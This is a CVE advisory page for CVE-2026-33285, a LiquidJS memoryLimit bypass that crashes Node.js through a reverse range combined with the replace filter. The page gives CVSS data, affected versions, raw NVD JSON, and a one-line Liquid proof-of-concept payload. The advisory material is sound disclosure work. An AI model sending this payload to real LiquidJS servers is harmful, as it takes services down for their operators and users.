Security Vulnerability Report
中文
CVE-2026-33285 CVSS 7.5 HIGH

CVE-2026-33285

Published: 2026-03-26 01:16:27
Last Modified: 2026-03-30 16:46:19
Source: [email protected]

Description

LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, LiquidJS's `memoryLimit` security mechanism can be completely bypassed by using reverse range expressions (e.g., `(100000000..1)`), allowing an attacker to allocate unlimited memory. Combined with a string flattening operation (e.g., `replace` filter), this causes a V8 Fatal error that crashes the Node.js process, resulting in complete denial of service from a single HTTP request. Version 10.25.1 patches the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:liquidjs:liquidjs:*:*:*:*:*:node.js:*:* - VULNERABLE
LiquidJS < 10.25.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
{%- comment -%} PoC for CVE-2026-33285 {%- endcomment -%} {%- assign huge_range = (100000000..1) -%} {{ huge_range | replace: '0', '0' }}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33285", "sourceIdentifier": "[email protected]", "published": "2026-03-26T01:16:27.363", "lastModified": "2026-03-30T16:46:19.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, LiquidJS's `memoryLimit` security mechanism can be completely bypassed by using reverse range expressions (e.g., `(100000000..1)`), allowing an attacker to allocate unlimited memory. Combined with a string flattening operation (e.g., `replace` filter), this causes a V8 Fatal error that crashes the Node.js process, resulting in complete denial of service from a single HTTP request. Version 10.25.1 patches the issue."}, {"lang": "es", "value": "LiquidJS es un motor de plantillas compatible con Shopify / GitHub Pages en JavaScript puro. Antes de la versión 10.25.1, el mecanismo de seguridad 'memoryLimit' de LiquidJS puede ser completamente eludido mediante el uso de expresiones de rango inverso (por ejemplo, '(100000000..1)'), permitiendo a un atacante asignar memoria ilimitada. Combinado con una operación de aplanamiento de cadenas (por ejemplo, el filtro 'replace'), esto causa un error fatal de V8 que provoca la caída del proceso de Node.js, resultando en una denegación de servicio completa desde una única solicitud HTTP. La versión 10.25.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liquidjs:liquidjs:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "10.25.1", "matchCriteriaId": "7E49E8C9-5FB9-40CA-BE2C-AC2B6553F472"}]}]}], "references": [{"url": "https://github.com/harttle/liquidjs/commit/95ddefc056a11a44d9e753fd47a39db2c241e578", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-9r5m-9576-7f6x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.